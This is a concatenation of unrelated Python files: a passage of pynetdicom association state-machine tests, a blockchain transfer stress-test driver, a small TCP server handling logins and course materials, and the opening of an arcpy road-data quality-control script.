while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
while not self.assoc.is_established:
time.sleep(0.05)
while not self.assoc.is_aborted:
time.sleep(0.05)
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
            ('Sta6', 'Evt16', 'AA-3'), # A-ABORT PDU recv
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
def test_associate_send_data(self):
"""Test association acceptance then send DIMSE message."""
self.scp = DummyVerificationSCP()
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
self.assoc.send_c_echo()
self.assoc.release()
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta6',
'Sta6',
            'Sta7', # Waiting for A-RELEASE-RP PDU
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt9', 'DT-1'), # P-DATA rq primitive
('Sta6', 'Evt10', 'DT-2'), # P-DATA-TF PDU recv
('Sta6', 'Evt11', 'AR-1'), # A-RELEASE rq primitive
('Sta7', 'Evt13', 'AR-3'), # A-RELEASE-RP PDU recv
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
def test_release_AR6(self):
"""Test receive P-DATA-TF while waiting for A-RELEASE-RP."""
# Requestor sends A-RELEASE-RQ, acceptor sends P-DATA-TF then
# A-RELEASE-RP
# Patch AR-4 to also send a P-DATA-TF
orig_entry = FINITE_STATE.ACTIONS['AR-4']
def AR_4(dul):
# Send C-ECHO-RQ
dul.socket.send(p_data_tf)
# Normal release response
dul.pdu = A_RELEASE_RP()
dul.pdu.from_primitive(dul.primitive)
# Callback
dul.socket.send(dul.pdu.encode())
dul.artim_timer.start()
return 'Sta13'
# In this case the association acceptor will hit AR_4
FINITE_STATE.ACTIONS['AR-4'] = ('Bluh', AR_4, 'Sta13')
self.scp = DummyVerificationSCP()
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
self.assoc.release()
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta7',
'Sta7', # Waiting for A-RELEASE-RP PDU
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt11', 'AR-1'), # A-RELEASE rq primitive
('Sta7', 'Evt10', 'AR-6'), # P-DATA-TF PDU recv
('Sta7', 'Evt13', 'AR-3'), # A-RELEASE-RP PDU recv
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
        FINITE_STATE.ACTIONS['AR-4'] = orig_entry
def test_release_AR7(self):
"""Test receive P-DATA primitive after A-RELEASE-RQ PDU."""
orig_entry = FINITE_STATE.ACTIONS['AR-2']
def AR_2(dul):
"""AR-2 occurs when an A-RELEASE-RQ PDU is received."""
# Add P-DATA primitive request
primitive = C_ECHO()
primitive.MessageID = 1
primitive.AffectedSOPClassUID = VerificationSOPClass
# Send C-ECHO request to the peer via DIMSE and wait for the response
dul.assoc.dimse.send_msg(primitive, 1)
# Normal AR2 response
dul.to_user_queue.put(dul.primitive)
return 'Sta8'
# In this case the association acceptor will hit AR_2
FINITE_STATE.ACTIONS['AR-2'] = ('Bluh', AR_2, 'Sta8')
self.scp = DummyVerificationSCP()
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
self.assoc.release()
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta7',
'Sta7', # Waiting for A-RELEASE-RP PDU
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt11', 'AR-1'), # A-RELEASE rq primitive
('Sta7', 'Evt10', 'AR-6'), # P-DATA-TF PDU recv
('Sta7', 'Evt13', 'AR-3'), # A-RELEASE-RP PDU recv
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
        FINITE_STATE.ACTIONS['AR-2'] = orig_entry
class TestStateMachineFunctionalAcceptor(object):
"""Functional tests for StateMachine as association acceptor."""
def setup(self):
"""Run prior to each test"""
self.scp = None
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
assoc.set_socket(AssociationSocket(assoc))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = validate_ae_title(b'ANY_SCU')
assoc.acceptor.address = 'localhost'
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = ''
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = (
ae.implementation_class_uid
)
assoc.requestor.implementation_version_name = (
ae.implementation_version_name
)
cx = build_context(VerificationSOPClass)
cx.context_id = 1
assoc.requestor.requested_contexts = [cx]
self.assoc = assoc
self.fsm = self.monkey_patch(assoc.dul.state_machine)
def teardown(self):
"""Clear any active threads"""
if self.scp:
self.scp.abort()
time.sleep(0.1)
for thread in threading.enumerate():
if isinstance(thread, DummyBaseSCP):
thread.abort()
thread.stop()
def monkey_patch(self, fsm):
"""Monkey patch the StateMachine to add testing hooks."""
# Record all state transitions
fsm._transitions = []
fsm.original_transition = fsm.transition
def transition(state):
fsm._transitions.append(state)
fsm.original_transition(state)
fsm.transition = transition
# Record all event/state/actions
fsm._changes = []
fsm.original_action = fsm.do_action
def do_action(event):
if (event, fsm.current_state) in TRANSITION_TABLE:
action_name = TRANSITION_TABLE[(event, fsm.current_state)]
fsm._changes.append((fsm.current_state, event, action_name))
fsm.original_action(event)
fsm.do_action = do_action
return fsm
def test_invalid_protocol_version(self):
"""Test receiving an A-ASSOC-RQ with invalid protocol version."""
self.scp = DummyVerificationSCP()
self.scp.start()
assert self.fsm.current_state == 'Sta1'
# Patch AE_2
orig_entry = FINITE_STATE.ACTIONS['AE-2']
def AE_2(dul):
dul.pdu = A_ASSOCIATE_RQ()
dul.pdu.from_primitive(dul.primitive)
dul.pdu.protocol_version = 0x0002
bytestream = dul.pdu.encode()
dul.socket.send(bytestream)
return 'Sta5'
FINITE_STATE.ACTIONS['AE-2'] = ('Bluh', AE_2, 'Sta5')
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
assert self.assoc.is_rejected
assert self.assoc.acceptor.primitive.result == 0x01
assert self.assoc.acceptor.primitive.result_source == 0x02
assert self.assoc.acceptor.primitive.diagnostic == 0x02
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
        FINITE_STATE.ACTIONS['AE-2'] = orig_entry
class TestEventHandling(object):
"""Test the FSM event handlers."""
def setup(self):
self.ae = None
def teardown(self):
if self.ae:
self.ae.shutdown()
def test_no_handlers(self):
"""Test with no handlers bound."""
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
scp = ae.start_server(('', 11112), block=False)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
scp.shutdown()
def test_transition_acceptor(self):
"""Test EVT_FSM_TRANSITION as acceptor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(('', 11112), block=False, evt_handlers=handlers)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assoc.release()
while scp.active_associations:
time.sleep(0.05)
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
assert event.event.name == 'EVT_FSM_TRANSITION'
assert event.event.description == "State machine about to transition"
states = [ee.current_state for ee in triggered]
assert states[:6] == ['Sta1', 'Sta2', 'Sta3', 'Sta6', 'Sta8', 'Sta13']
scp.shutdown()
def test_transition_acceptor_bind(self):
"""Test EVT_FSM_TRANSITION as acceptor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
scp = ae.start_server(('', 11112), block=False)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
scp.bind(evt.EVT_FSM_TRANSITION, handle)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assoc.release()
while scp.active_associations:
time.sleep(0.05)
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:3] == ['Sta6', 'Sta8', 'Sta13']
def test_transition_acceptor_unbind(self):
"""Test EVT_FSM_TRANSITION as acceptor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(('', 11112), block=False, evt_handlers=handlers)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
scp.unbind(evt.EVT_FSM_TRANSITION, handle)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
while scp.active_associations:
time.sleep(0.05)
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:3] == ['Sta1', 'Sta2', 'Sta3']
scp.shutdown()
def test_transition_requestor(self):
"""Test EVT_FSM_TRANSITION as requestor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(('', 11112), block=False)
assoc = ae.associate('localhost', 11112, evt_handlers=handlers)
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assert assoc.is_established
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
while not assoc.is_released:
time.sleep(0.05)
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:5] == ['Sta1', 'Sta4', 'Sta5', 'Sta6', 'Sta7']
scp.shutdown()
def test_transition_requestor_bind(self):
"""Test EVT_FSM_TRANSITION as requestor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
scp = ae.start_server(('', 11112), block=False)
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.bind(evt.EVT_FSM_TRANSITION, handle)
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
while not assoc.is_released:
time.sleep(0.05)
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:2] == ['Sta6', 'Sta7']
scp.shutdown()
def test_transition_requestor_unbind(self):
"""Test EVT_FSM_TRANSITION as requestor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(('', 11112), block=False)
assoc = ae.associate('localhost', 11112, evt_handlers=handlers)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assoc.unbind(evt.EVT_FSM_TRANSITION, handle)
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
while not assoc.is_released:
time.sleep(0.05)
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:3] == ['Sta1', 'Sta4', 'Sta5']
scp.shutdown()
def test_transition_raises(self, caplog):
"""Test the handler for EVT_FSM_TRANSITION raising exception."""
def handle(event):
raise NotImplementedError("Exception description")
self.ae = ae = AE()
ae.add_supported_context(VerificationSOPClass)
ae.add_requested_context(VerificationSOPClass)
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(('', 11112), block=False, evt_handlers=handlers)
with caplog.at_level(logging.ERROR, logger='pynetdicom'):
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
assoc.release()
while scp.active_associations:
time.sleep(0.05)
scp.shutdown()
msg = (
"Exception raised in user's 'evt.EVT_FSM_TRANSITION' event "
"handler 'handle'"
)
assert msg in caplog.text
assert "Exception description" in caplog.text
|
p2p_stress.py
|
import testUtils
import p2p_test_peers
import random
import time
import copy
import threading
from core_symbol import CORE_SYMBOL
class StressNetwork:
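    """Network stress test driver: pushes token transfers through a node at
    each rate in ``speeds`` (transactions/sec) for ``sec`` seconds, using up
    to ``maxthreads`` worker threads per burst."""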
speeds=[1,5,10,30,60,100,500]
sec=10
maxthreads=100
trList=[]
def maxIndex(self):
return len(self.speeds)
def randAcctName(self):
s=""
for i in range(12):
s=s+random.choice("abcdefghijklmnopqrstuvwxyz12345")
return s
def _transfer(self, node, acc1, acc2, amount, threadId, round):
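        """Transfer ``amount`` from ``acc1`` to ``acc2`` on ``node``; the memo
        encodes the thread id and round so each transfer can be traced."""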
memo="%d %d" % (threadId, round)
tr = node.transferFunds(acc1, acc2, amount, memo)
self.trList.append(tr)
def execute(self, cmdInd, node, ta, eotio):
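        """Run one stress round at ``speeds[cmdInd]`` transactions/sec.

        Creates two throwaway accounts, issues currency into the first, then
        fires transfers to the second in timed bursts of worker threads.
        Returns (transaction id list, receiving account name, expected
        balance, error message); the error message is empty on success."""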
print("\n==== network stress test: %d transaction(s)/s for %d secs ====" % (self.speeds[cmdInd], self.sec))
total = self.speeds[cmdInd] * self.sec
ta.name = self.randAcctName()
acc1 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, eotio, stakedDeposit=0, waitForTransBlock=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
ta.name = self.randAcctName()
acc2 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, eotio, stakedDeposit=0, waitForTransBlock=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
print("issue currency0000 into %s" % (acc1.name))
contract="eotio"
action="issue"
data="{\"to\":\"" + acc1.name + "\",\"quantity\":\"1000000.0000 "+CORE_SYMBOL+"\"}"
opts="--permission eotio@active"
tr=node.pushMessage(contract, action, data, opts)
trid = node.getTransId(tr[1])
if trid is None:
return ([], "", 0.0, "failed to issue currency0000")
print("transaction id %s" % (trid))
node.waitForTransIdOnNode(trid)
self.trList = []
expBal = 0
nthreads=self.maxthreads
if nthreads > self.speeds[cmdInd]:
nthreads = self.speeds[cmdInd]
cycle = int(total / nthreads)
total = cycle * nthreads # rounding
delay = 1.0 / self.speeds[cmdInd] * nthreads
print("start currency0000 trasfer from %s to %s for %d times with %d threads" % (acc1.name, acc2.name, total, nthreads))
t00 = time.time()
for k in range(cycle):
t0 = time.time()
amount = 1
threadList = []
for m in range(nthreads):
th = threading.Thread(target = self._transfer,args = (node, acc1, acc2, amount, m, k))
th.start()
threadList.append(th)
for th in threadList:
th.join()
expBal = expBal + amount * nthreads
t1 = time.time()
if (t1-t0 < delay):
time.sleep(delay - (t1-t0))
t11 = time.time()
print("time used = %lf" % (t11 - t00))
actBal = node.getAccountBalance(acc2.name)
print("account %s: expect Balance:%d, actual Balance %d" % (acc2.name, expBal, actBal))
transIdlist = []
for tr in self.trList:
trid = node.getTransId(tr)
transIdlist.append(trid)
node.waitForTransIdOnNode(trid)
return (transIdlist, acc2.name, expBal, "")
def on_exit(self):
print("end of network stress tests")
|
main.py
|
import atexit
import operator
import select
import socket
import sys
import threading
import Server_Functions
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def Connection_Management():
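    # The request appears to be a fixed-layout string (assumed format, inferred
    # from the parsing below): two option digits, one subject character, two
    # week digits, then the id and password delimited by "]" characters,
    # followed by the file name. Leading zeros in option/week are dropped.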
try:
try:
connection, port = server_socket.accept()
received_data = connection.recv(1000).decode("utf-8", "strict")
option = ""
subject = ""
week = ""
id = ""
password = ""
filename = ""
if len(received_data) > 0:
for index in range(0, len(received_data)):
if index == 0:
if str(received_data[index]) != "0":
option += str(received_data[index])
elif index == 1:
option += str(received_data[index])
elif index == 2:
subject += str(received_data[index])
elif index == 3:
if str(received_data[index]) != "0":
week += str(received_data[index])
elif index == 4:
week += str(received_data[index])
elif (index > 5) and (index < operator.indexOf(str(received_data), "]")):
id += str(received_data[index])
elif (index > operator.indexOf(str(received_data), "]") + 1) and (
index < len(str(received_data)) - 1 - operator.indexOf(reversed(str(received_data)), "]")):
password += str(received_data[index])
elif index > len(str(received_data)) - 1 - operator.indexOf(reversed(str(received_data)), "]"):
filename += str(received_data[index])
match option:
case "1":
credential_function = Server_Functions.Credential_Functions(id, password)
retrieved_value = credential_function.Log_In()
connection.send(str.encode(retrieved_value))
case "2":
credential_function = Server_Functions.Credential_Functions(id, password)
retrieved_value = credential_function.Register()
connection.send(str.encode(retrieved_value))
case "3":
credential_function = Server_Functions.Credential_Functions(id, password)
retrieved_value = credential_function.Log_Out()
connection.send(str.encode(retrieved_value))
case "4":
profile_function = Server_Functions.Profile_Functions(id, password)
retrieved_value = profile_function.Download_Profile_Picture()
connection.send(retrieved_value)
case "5":
contacts_function = Server_Functions.Contact_Functions(id, password, filename)
retrieved_value = contacts_function.Load_Contacts()
connection.send(retrieved_value)
case "6":
contacts_function = Server_Functions.Contact_Functions(id, password, filename)
retrieved_value = contacts_function.Download_Contact_Picture()
connection.send(retrieved_value)
case "7":
grades_function = Server_Functions.Grades_Functions(id, password, subject)
retrieved_value = grades_function.Load_Grades()
connection.send(retrieved_value)
case "8":
materials_function = Server_Functions.Material_Functions(id, password, subject, "", "")
retrieved_value = materials_function.Load_Materials()
connection.send(retrieved_value)
case "9":
materials_function = Server_Functions.Material_Functions(id, password, subject, filename, week)
retrieved_value = materials_function.Download_Material()
connection.send(retrieved_value)
except:
pass
except KeyboardInterrupt:
threading.current_thread().join()
server_socket.close()
sys.exit(0)
def Server_Operation():
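    """Listen for incoming connections and handle each one on its own thread."""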
server_socket.listen(1000)
while True:
try:
try:
                connection_management_thread = threading.Thread(target=Connection_Management)
connection_management_thread.start()
except:
atexit.register(sys.exit(0))
except KeyboardInterrupt:
threading.current_thread().join()
server_socket.close()
sys.exit(0)
break
if __name__ == "__main__":
try:
try:
print("##################################")
print("# #")
print("# SERVER OPENED AND LISTENING #")
print("# #")
print("##################################")
server_socket.bind(("0.0.0.0", 22))
print("ADDRESS: " + str(socket.gethostbyname(socket.gethostname())))
print("PORT: " + str(server_socket.getsockname()[1]))
            thread = threading.Thread(target=Server_Operation)
thread.start()
except:
atexit.register(sys.exit(0))
except KeyboardInterrupt:
sys.exit(0)
|
OffSystem_v81.py
|
__date__ = '5/29/14'
__author__ = 'ABREZNIC'
import os, arcpy, xlwt, datetime, math, multiprocessing, shutil, smtplib, base64
# date
now = datetime.datetime.now()
curMonth = now.strftime("%m")
curDay = now.strftime("%d")
curYear = now.strftime("%Y")
today = curYear + "_" + curMonth + "_" + curDay
runday = now.strftime("%B") + " " + curDay + ", " + curYear
# variables
# check0 = arcpy.GetParameterAsText(0)
# check1 = arcpy.GetParameterAsText(1)
# check2 = arcpy.GetParameterAsText(2)
# check3 = arcpy.GetParameterAsText(3)
# check4 = arcpy.GetParameterAsText(4)
# check5 = arcpy.GetParameterAsText(5)
# check6 = arcpy.GetParameterAsText(6)
# check7 = arcpy.GetParameterAsText(7)
# check8 = arcpy.GetParameterAsText(8)
# check9 = arcpy.GetParameterAsText(9)
check0 = "C:\\TxDOT\\Scripts\\QC\\test"
allchecks = "false"
cityoverlaps = "true"
routeopens = "false"
offgeommeas = "false"
sublen = "false"
multimeasPNG = "false"
onattmeas = "false"
offatt = "false"
scnln = "false"
# if allchecks != "true":
# allchecks = "false"
# if cityoverlaps != "true":
# cityoverlaps = "false"
# if routeopens != "true":
# routeopens = "false"
# if offgeommeas != "true":
# offgeommeas = "false"
# if sublen != "true":
# sublen = "false"
# if multimeasPNG != "true":
# multimeasPNG = "false"
# if onattmeas != "true":
# onattmeas = "false"
# if offatt != "true":
# offatt = "false"
# if scnln != "true":
# scnln = "false"
qcfolder = check0
workspace = qcfolder + "\\" + today
where = """ ( RDBD_TYPE = 'CNCTR-GS' AND RTE_CLASS = '1' ) OR( (RTE_CLASS = '2' OR RTE_CLASS = '3') AND RDBD_TYPE = 'KG' AND RTE_CLASS <> '8' ) """
database = workspace + "\\Comanche_Copy.gdb"
roadways = database + "\\TXDOT_Roadways"
subfiles = database + "\\SUBFILES"
cities = database + "\\City"
districts = database + "\\District"
disterrors = []
if not os.path.exists(workspace):
os.makedirs(workspace)
txdotroads = "Database Connections\\Connection to Comanche.sde\\TPP_GIS.APP_TPP_GIS_ADMIN.Roadways\\TPP_GIS.APP_TPP_GIS_ADMIN.TXDOT_Roadways"
txdotsubs = "Database Connections\\Connection to Comanche.sde\\TPP_GIS.APP_TPP_GIS_ADMIN.SUBFILES"
txdotcity = "Database Connections\\Connection to Comanche.sde\\TPP_GIS.APP_TPP_GIS_ADMIN.City\\TPP_GIS.APP_TPP_GIS_ADMIN.City"
txdotdist = "Database Connections\\Connection to Comanche.sde\\TPP_GIS.APP_TPP_GIS_ADMIN.District\\TPP_GIS.APP_TPP_GIS_ADMIN.District"
cityexcept = "Database Connections\\Connection to Comanche.sde\\TPP_GIS.APP_TPP_GIS_ADMIN.ERRCHKS_CITY_OVERLAP"
def copylocal():
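    """Copy the roadway, subfile, city and district data from the Comanche SDE
    connection into a local file geodatabase for this run."""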
arcpy.AddMessage("Copying data local...")
arcpy.CreateFileGDB_management(workspace, "Comanche_Copy.gdb")
arcpy.TableToTable_conversion(txdotsubs, database, "SUBFILES")
arcpy.AddMessage("Subfiles copied.")
arcpy.Copy_management(txdotcity, cities)
arcpy.AddMessage("Cities copied.")
arcpy.Copy_management(txdotdist, districts)
arcpy.AddMessage("Districts copied.")
arcpy.SpatialJoin_analysis(txdotroads, districts, roadways)
arcpy.AddMessage("Roadways copied.")
return
def overlap(d):
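    """City overlap check: flag functionally classified streets (RTE_CLASS 3)
    that fall outside city limits and county roads (RTE_CLASS 2) that fall
    inside them, skipping known exceptions; results are pushed onto ``d``
    (presumably a multiprocessing result store)."""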
try:
arcpy.AddMessage("Starting city overlap check...")
arcpy.CreateFileGDB_management(workspace, "Overlap_Working.gdb")
dbase = workspace + "\\Overlap_Working.gdb"
overlaproads = dbase + "\\OverlapRoads"
arcpy.SpatialJoin_analysis(roadways, cities, overlaproads)
arcpy.Select_analysis(overlaproads, dbase + "\\FC_Streets", """ RTE_CLASS = '3' """)
arcpy.Erase_analysis(dbase + "\\FC_Streets", cities, dbase + "\\FC_Streets_Errors")
arcpy.Clip_analysis(overlaproads, cities, dbase + "\\City_Roads")
arcpy.Select_analysis(dbase + "\\City_Roads", dbase + "\\County_Roads_Errors", """ RTE_CLASS = '2' """)
arcpy.Merge_management([dbase + "\\County_Roads_Errors", dbase + "\\FC_Streets_Errors"],
dbase + "\\MergedErrors")
arcpy.SpatialJoin_analysis(dbase + "\\MergedErrors", districts, dbase + "\\City_OverlapErrors")
exceptions = {}
cursor = arcpy.SearchCursor(cityexcept)
for row in cursor:
exceptions[row.RTE_ID] = [row.CITY, row.EXCEPTION]
del cursor
del row
errors = []
cursor = arcpy.UpdateCursor(dbase + "\\City_OverlapErrors")
counter = 0
for row in cursor:
geom = row.shape
len = geom.length * .000621371
if len < .003:
cursor.deleteRow(row)
else:
row.setValue("RTE_LEN", len)
cursor.updateRow(row)
if row.RTE_ID in exceptions.keys():
                    values = exceptions[row.RTE_ID]
                    cex = values[0]
                    # Exceptions are stored as [CITY, EXCEPTION]; index 1 is
                    # the expected overlap length.
                    eex = values[1]
thediff = abs(len - eex)
if row.CITY_NM == cex and thediff < .003:
pass
else:
rowinfo = [row.RTE_ID, row.RTE_LEN, row.DIST_NM, row.DIST_NBR, row.CITY_NM, row.TX_CITY_NBR]
errors.append(rowinfo)
counter += 1
else:
rowinfo = [row.RTE_ID, row.RTE_LEN, row.DIST_NM, row.DIST_NBR, row.CITY_NM, row.TX_CITY_NBR]
errors.append(rowinfo)
counter += 1
del row
del cursor
arcpy.FeatureClassToShapefile_conversion(dbase + "\\City_OverlapErrors", workspace)
arcpy.AddMessage(str(counter) + " overlap errors.")
goose = ["overlap", errors]
d.put(goose)
except:
print "!!!OVERLAP FAILED!!!"
def routeopen(d):
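    """Route open check: compare RTE_OPEN/RTE_LEN in TXDOT_Roadways against
    HIGHWAY_STATUS/LEN_OF_SECTION totals in SUBFILES and record mismatches."""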
try:
arcpy.AddMessage("Starting route open check...")
errors = []
openstatus = {}
counter = 0
whereto = """ ( RDBD_TYPE = 'CNCTR-GS' AND RTE_CLASS = '1' ) OR( (RTE_CLASS = '2' OR RTE_CLASS = '3') AND RDBD_TYPE = 'KG' AND RTE_CLASS <> '8' ) OR( RTE_NM = '183A' AND RTE_ID LIKE '183A-%') """
cursor = arcpy.SearchCursor(roadways, whereto)
for row in cursor:
id = row.RTE_ID
if id is not None and id != "":
open = str(row.RTE_OPEN)
length = row.RTE_LEN
key = id + "=" + open
if key not in openstatus.keys():
openstatus[key] = length
else:
openstatus[key] = openstatus[key] + length
else:
errorinfo = []
oid = str(row.OBJECTID)
errorinfo.append("OID: " + oid)
errorinfo.append("N/A")
errorinfo.append("N/A")
errorinfo.append("BAD RTE_ID")
errorinfo.append(row.DIST_NBR)
errors.append(errorinfo)
counter += 1
arcpy.AddMessage(str(counter) + " null/bad RouteID errors. Let's check a few other things...")
del cursor
counter = 0
hwystatus = {}
